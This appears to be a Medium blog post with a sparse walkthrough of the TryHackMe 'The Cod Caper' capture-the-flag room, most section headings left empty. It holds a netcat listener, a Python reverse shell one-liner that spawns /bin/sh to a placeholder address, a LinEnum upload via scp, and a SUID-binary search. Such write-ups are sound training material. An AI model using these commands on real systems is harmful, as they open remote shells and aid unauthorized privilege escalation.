Tryhackme:The Cod Caper

Intro:

  1. Help me out! :)

Host Enumeration:

Useful flags:

Web Enumeration:

Useful flags:

  • x=Used to specify file extensions i.e “php,txt,html”
    — url=Used to specify which url to enumerate
    — wordlist=Used to specify which wordlist that is appended on the url path

Web Exploitation:

  1. What is the admin username?

Command Execution:

  1. How many files are in the current directory?
nc -nvlp 80
python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ADDRES",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

LinEnum:

Method 1: SCP

Method 2: SimpleHTTPServer

scp LinEnum.sh pingu@cod:/tmp
chmod +x LinEnum.sh
/LinEnum.sh
find / -perm -u=s -type f 2>/dev/null

pwndbg:

Binary-Exploitaion: Manually:

Binary Exploitation: The pwntools way:

Finishing the job:

Thankyou:

--

--

--

CTF-PLAYER, security analyst, Pentesting, vapt, digital forensics

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Damn Vulnerable DeFi Challenge #1 — Unstoppable

{UPDATE} Cookie Clickers 2 Hack Free Resources Generator

How to trade HDR safety guide

XCAD Network Stickers/Meme/GIFs/Video Competition

Think Hackers Don’t Care About SMBs? Think Again.

Keeping your personal data safe — why data insurance isn’t something just businesses need

Cyberbulling PSA

Content Provenance and Authenticity

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
jagadeesh

jagadeesh

CTF-PLAYER, security analyst, Pentesting, vapt, digital forensics

More from Medium

CRODO.io — first IDO platform in the Cronos ecosystem

FAME x The Studio K

FantomPad is launching on NFTPad

CS371p Spring 2022: Winnie Chang: Final Entry